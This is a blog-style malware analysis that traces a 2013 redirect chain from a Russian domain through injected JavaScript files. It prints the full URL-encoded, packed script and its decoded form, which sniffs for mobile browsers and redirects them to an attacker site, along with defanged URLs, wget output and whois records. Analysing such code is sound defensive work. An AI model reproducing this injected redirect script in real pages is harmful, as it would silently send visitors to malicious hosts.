The journey starts with a link of urlquery.com website.

http://urlquery.net/report.php?id=2495895

Where this link tell us about a malicious URL: h00p://polycontract[dot]ru/Wallmart.html?go=help

The URL is normal one if you ignore the .ru thing 🙂

When I tried to execute this one over my Browser they redirected me to

https://www.google.com/search?q=wallmart

Then I have to use wget to get the download this file.

After downloading this file I tried to open this in Browser and again the same redirection. Grrr..

Let’s see the reply header

HTTP/1.1 200 OK
 Server: nginx/0.8.54
 Date: Thu, 16 May 2013 14:26:15 GMT
 Content-Type: text/html
 Connection: keep-alive
 Last-Modified: Thu, 16 May 2013 14:03:59 GMT
 ETag: "6bc8011-2e9-4dcd6567d31c0"
 Accept-Ranges: bytes
 Content-Length: 745

Ok so we all know the website is not down and it’s redirecting, as we have the code so let’s take look over the code which is redirecting us.

<titl>Wallmart is loading...</title>
<script type="text/javascript"><!--
location.replace("h00p://virgin-altantic[dot]net/news/ask-index.php");//--></script>
<noscript>
<meta http-equiv="refresh" content="0; url=h00p://virgin-altantic[dot]net/news/ask-index.php"></noscript>

Suspicious ok let’s see what virustotal say about this this website.

https://www.virustotal.com/en/url/b9ae75bcf2d8bc16b2f14b1ca12eafb755ff6d18fb9beb4b3a9f877c8a4b177a/analysis/1368878313/

and

https://www.virustotal.com/en/url/3077275f26bf120619a28734abebf7d321efa8be0c43b6bb0954d5092337a873/analysis/1368878322/

The above 2 are the URL with which I started with and another one is of

h00p://polycontract[dot]ru

So, they got redirection over every webpage so I have to download every thing using wget and then to analyze it, no GUI only code 😦

2 different analysis anyways good thing is it’s still showing us that it is malicious 🙂

After downloading the 2nd file I analysed it and find out there are 2 java scripts in that one.

So, I downloaded those 2 files respectively and the link were

<script src="/media/system/js/core.js" type="text/javascript"></script>
<script src="/media/system/js/caption.js" type="text/javascript"></script>

Time to analyze these 2 files. The virus total reports are

For core.js

https://www.virustotal.com/en/file/6f9229b2551587de22aa693b5da6e5ff350d521825b675a3549d0e09cccd67a1/analysis/1368878881/

For caption.js

https://www.virustotal.com/en/file/66b9077dc4b1c53d1d4bb7e9d3e333a5a3a3aae4b9d01f96b5c8d5c722208e94/analysis/1368878892/

Indeed they are malicious.

Time to take a look inside these 2

document.write(unescape("%3C%73%63%72%69%70%74%20%74%79%70%65%3D%22%74%65%78%74%2F%6A%61%76%61%73%63%72%69%70%74%22%3E%65%76%61%6C%28%66%75%6E%63%74%69%6F%6E%28%70%2C%61%2C%63%2C%6B%2C%65%2C%72%29%7B%65%3D%66%75%6E%63%74%69%6F%6E%28%63%29%7B%72%65%74%75%72%6E%28%63%3C%61%3F%27%27%3A%65%28%70%61%72%73%65%49%6E%74%28%63%2F%61%29%29%29%2B%28%28%63%3D%63%25%61%29%3E%33%35%3F%53%74%72%69%6E%67%2E%66%72%6F%6D%43%68%61%72%43%6F%64%65%28%63%2B%32%39%29%3A%63%2E%74%6F%53%74%72%69%6E%67%28%33%36%29%29%7D%3B%69%66%28%21%27%27%2E%72%65%70%6C%61%63%65%28%2F%5E%2F%2C%53%74%72%69%6E%67%29%29%7B%77%68%69%6C%65%28%63%2D%2D%29%72%5B%65%28%63%29%5D%3D%6B%5B%63%5D%7C%7C%65%28%63%29%3B%6B%3D%5B%66%75%6E%63%74%69%6F%6E%28%65%29%7B%72%65%74%75%72%6E%20%72%5B%65%5D%7D%5D%3B%65%3D%66%75%6E%63%74%69%6F%6E%28%29%7B%72%65%74%75%72%6E%27%5C%5C%77%2B%27%7D%3B%63%3D%31%7D%3B%77%68%69%6C%65%28%63%2D%2D%29%69%66%28%6B%5B%63%5D%29%70%3D%70%2E%72%65%70%6C%61%63%65%28%6E%65%77%20%52%65%67%45%78%70%28%27%5C%5C%62%27%2B%65%28%63%29%2B%27%5C%5C%62%27%2C%27%67%27%29%2C%6B%5B%63%5D%29%3B%72%65%74%75%72%6E%20%70%7D%28%27%37%20%31%3D%38%2E%39%2E%61%28%2F%28%62%29%7C%28%65%29%7C%28%66%29%7C%28%68%29%7C%28%6A%29%7C%28%6B%29%7C%28%6C%29%7C%28%6D%29%7C%28%6E%29%7C%28%6F%29%7C%28%70%29%7C%28%71%29%7C%28%72%29%7C%28%73%29%7C%28%75%2D%29%7C%28%77%29%7C%28%78%29%7C%28%79%29%7C%28%7A%29%7C%28%41%29%7C%28%42%29%7C%28%43%29%7C%28%44%29%7C%28%45%29%7C%28%46%29%7C%28%47%29%7C%28%30%2D%63%29%7C%28%30%2D%64%29%7C%28%30%2D%67%29%7C%28%48%2D%29%7C%28%49%29%7C%28%4A%29%7C%28%32%29%7C%28%4B%29%7C%28%4C%29%7C%28%4D%29%7C%28%4E%2D%29%7C%28%4F%29%7C%28%50%29%7C%28%51%2D%29%7C%28%52%29%7C%28%53%29%7C%28%54%29%7C%28%55%29%7C%28%56%29%7C%28%57%29%7C%28%58%29%7C%28%59%29%7C%28%5A%29%7C%28%31%30%29%7C%28%31%31%29%7C%28%31%32%29%7C%28%31%33%29%7C%28%31%34%29%7C%28%31%35%29%7C%28%31%36%29%7C%28%31%37%29%7C%28%31%38%2D%29%7C%28%31%39%2D%29%7C%28%31%61%29%7C%28%31%62%29%7C%28%31%63%2D%29%7C%28%31%64%29%7C%28%31%65%2D%29%7C%28%31%66%29%7C%28%31%67%29%7C%28%31%68%29%7C%28%31%69%29%7C%28%31%6A%2D%29%7C%28%31%6B%29%7C%28%74%2D%31%6C%29%7C%28%31%6D%29%7C%28%31%6E%2D%29%7C%28%31%6F%29%7C%28%31%70%2D%29%7C%28%31%71%29%7C%28%31%72%29%7C%28%31%73%2D%76%29%7C%28%31%74%29%7C%28%31%75%29%7C%28%33%2D%29%7C%28%31%76%29%7C%28%31%77%29%7C%28%31%78%29%7C%28%31%79%29%7C%28%31%7A%29%7C%28%34%29%7C%28%34%29%7C%28%35%29%7C%28%35%2D%29%7C%28%36%2E%31%41%29%7C%28%36%2E%31%42%29%7C%28%31%43%2E%31%44%29%7C%28%31%45%29%7C%28%31%46%29%7C%28%31%47%29%7C%28%31%48%29%7C%28%32%29%7C%28%33%29%7C%28%31%49%29%7C%28%31%4A%29%7C%28%31%4B%29%7C%28%31%4C%29%7C%28%31%4D%29%7C%28%31%4E%29%7C%28%31%4F%29%7C%28%31%50%2E%31%51%29%7C%28%31%52%29%7C%28%31%53%29%2F%69%29%3B%31%54%28%31%29%7B%31%55%2E%31%56%2E%31%57%3D%22%31%58%22%7D%27%2C%36%32%2C%31%32%32%2C%27%6C%67%7C%69%73%6D%6F%62%69%6C%65%7C%6D%69%64%70%7C%77%61%70%7C%77%69%6E%77%7C%78%64%61%7C%75%70%7C%76%61%72%7C%6E%61%76%69%67%61%74%6F%72%7C%75%73%65%72%41%67%65%6E%74%7C%6D%61%74%63%68%7C%61%63%73%7C%7C%7C%61%6C%61%76%7C%61%6C%63%61%7C%7C%61%6D%6F%69%7C%7C%61%75%64%69%7C%61%73%74%65%7C%61%76%61%6E%7C%62%65%6E%71%7C%62%69%72%64%7C%62%6C%61%63%7C%62%6C%61%7A%7C%62%72%65%77%7C%63%65%6C%6C%7C%63%6C%64%63%7C%7C%63%6D%64%7C%7C%64%61%6E%67%7C%64%6F%63%6F%7C%65%72%69%63%7C%68%69%70%74%7C%69%6E%6E%6F%7C%69%70%61%71%7C%6A%61%76%61%7C%6A%69%67%73%7C%6B%64%64%69%7C%6B%65%6A%69%7C%6C%65%6E%6F%7C%6C%67%65%7C%6D%61%75%69%7C%6D%61%78%6F%7C%6D%69%74%73%7C%6D%6D%65%66%7C%6D%6F%62%69%7C%6D%6F%74%7C%6D%6F%74%6F%7C%6D%77%62%70%7C%6E%65%63%7C%6E%65%77%74%7C%6E%6F%6B%69%7C%6F%70%77%76%7C%70%61%6C%6D%7C%70%61%6E%61%7C%70%61%6E%74%7C%70%64%78%67%7C%70%68%69%6C%7C%70%6C%61%79%7C%70%6C%75%63%7C%70%6F%72%74%7C%70%72%6F%78%7C%71%74%65%6B%7C%71%77%61%70%7C%73%61%67%65%7C%73%61%6D%73%7C%73%61%6E%79%7C%73%63%68%7C%73%65%63%7C%73%65%6E%64%7C%73%65%72%69%7C%73%67%68%7C%73%68%61%72%7C%73%69%65%7C%73%69%65%6D%7C%73%6D%61%6C%7C%73%6D%61%72%7C%73%6F%6E%79%7C%73%70%68%7C%73%79%6D%62%7C%6D%6F%7C%74%65%6C%69%7C%74%69%6D%7C%74%6F%73%68%7C%74%73%6D%7C%75%70%67%31%7C%75%70%73%69%7C%76%6B%7C%76%6F%64%61%7C%77%33%63%73%7C%77%61%70%61%7C%77%61%70%69%7C%77%61%70%70%7C%77%61%70%72%7C%77%65%62%63%7C%62%72%6F%77%73%65%72%7C%6C%69%6E%6B%7C%77%69%6E%64%6F%77%73%7C%63%65%7C%69%65%6D%6F%62%69%6C%65%7C%6D%69%6E%69%7C%6D%6D%70%7C%73%79%6D%62%69%61%6E%7C%70%68%6F%6E%65%7C%70%6F%63%6B%65%74%7C%6D%6F%62%69%6C%65%7C%61%6E%64%72%6F%69%64%7C%70%64%61%7C%50%50%43%7C%53%65%72%69%65%73%36%30%7C%4F%70%65%72%61%7C%4D%69%6E%69%7C%69%70%61%64%7C%69%70%68%6F%6E%65%7C%69%66%7C%64%6F%63%75%6D%65%6E%74%7C%6C%6F%63%61%74%69%6F%6E%7C%68%72%65%66%7C%68%74%74%70%3A%2F%2F%6F%6E%6C%69%6E%65%32%79%6F%75%2E%6F%72%67%2F%73%65%61%72%63%68%2E%70%68%70%3F%73%69%64%3D%31%20%27%2E%73%70%6C%69%74%28%27%7C%27%29%2C%30%2C%7B%7D%29%29%3B%3C%2F%73%63%72%69%70%74%3E%09"));

The malicious code is common for both of the files.

After decrypting it what I got is

document.write(unescape("<script type="text/javascript">eval(function(p,a,c,k,e,r){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return'\\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p}('7 1=8.9.a(/(b)|(e)|(f)|(h)|(j)|(k)|(l)|(m)|(n)|(o)|(p)|(q)|(r)|(s)|(u-)|(w)|(x)|(y)|(z)|(A)|(B)|(C)|(D)|(E)|(F)|(G)|(0-c)|(0-d)|(0-g)|(H-)|(I)|(J)|(2)|(K)|(L)|(M)|(N-)|(O)|(P)|(Q-)|(R)|(S)|(T)|(U)|(V)|(W)|(X)|(Y)|(Z)|(10)|(11)|(12)|(13)|(14)|(15)|(16)|(17)|(18-)|(19-)|(1a)|(1b)|(1c-)|(1d)|(1e-)|(1f)|(1g)|(1h)|(1i)|(1j-)|(1k)|(t-1l)|(1m)|(1n-)|(1o)|(1p-)|(1q)|(1r)|(1s-v)|(1t)|(1u)|(3-)|(1v)|(1w)|(1x)|(1y)|(1z)|(4)|(4)|(5)|(5-)|(6.1A)|(6.1B)|(1C.1D)|(1E)|(1F)|(1G)|(1H)|(2)|(3)|(1I)|(1J)|(1K)|(1L)|(1M)|(1N)|(1O)|(1P.1Q)|(1R)|(1S)/i);1T(1){1U.1V.1W="1X"}',62,122,'lg|ismobile|midp|wap|winw|xda|up|var|navigator|userAgent|match|acs|||alav|alca||amoi||audi|aste|avan|benq|bird|blac|blaz|brew|cell|cldc||cmd||dang|doco|eric|hipt|inno|ipaq|java|jigs|kddi|keji|leno|lge|maui|maxo|mits|mmef|mobi|mot|moto|mwbp|nec|newt|noki|opwv|palm|pana|pant|pdxg|phil|play|pluc|port|prox|qtek|qwap|sage|sams|sany|sch|sec|send|seri|sgh|shar|sie|siem|smal|smar|sony|sph|symb|mo|teli|tim|tosh|tsm|upg1|upsi|vk|voda|w3cs|wapa|wapi|wapp|wapr|webc|browser|link|windows|ce|iemobile|mini|mmp|symbian|phone|pocket|mobile|android|pda|PPC|Series60|Opera|Mini|ipad|iphone|if|document|location|href|h00p://online2you[dot]org/search.php?sid=1 '.split('|'),0,{}));</script> "));

Which is finally redirecting you to

h00p://online2you[dot]org/search.php?sid=1

Next task was to get the payload as most probably this was the site where they have hidden the treasure.

But unfortunately this was down error 404

h00p://online2you[dot]org/search.php?sid=1
Resolving online2you.org... 67.215.66.132
 Connecting to online2you.org|67.215.66.132|:80... connected.
 HTTP request sent, awaiting response... 404 Not Found
 2013-05-18 17:44:43 ERROR 404: Not Found.

I thought as there is redirection everywhere then this might be because of different location, So I tried it with proxy os US,Russia and some 3-4 more sut same result for every thing.

is it me or everyone else is unable to download the contents from this site?

ok let’s see the who is for the website

whois for  h00p://polycontract[dot]ru/

domain:        POLYCONTRACT.RU
nserver:       ns1.hosting.reg.ru.
nserver:       ns2.hosting.reg.ru.
state:         REGISTERED, DELEGATED, UNVERIFIED
org:           PoliKontrakt, LLC
registrar:     REGRU-REG-RIPN
admin-contact: http://www.reg.ru/whois/admin_contact
created:       2011.01.18
paid-till:     2014.01.18
free-date:     2014.02.18
source:        TCI

urlquery report for online2you: http://urlquery.net/report.php?id=1747064

whois for h00p://online2you[dot]org/

Domain ID:D168159997-LROR
Domain Name:ONLINE2YOU.ORG
Created On:14-Mar-2013 22:36:14 UTC
Last Updated On:14-May-2013 03:45:15 UTC
Expiration Date:14-Mar-2014 22:36:14 UTC
Sponsoring Registrar:Bizcn.com, Inc. (R1248-LROR)
Status:OK Registrant ID:orgph63300498572
Registrant Name:Whois Agent
Registrant Organization:Whois Privacy Protection Service
status: ACTIVE
 remarks: Registration information: http://www.pir.org

And in last snap shot of all the the files which I have gathered

Screen Shot 2013-05-18 at 5.55.55 PM

This was my Journey and this was the end.

Your Inputs / Criticism are required

#MalwareMustDie

Advertisements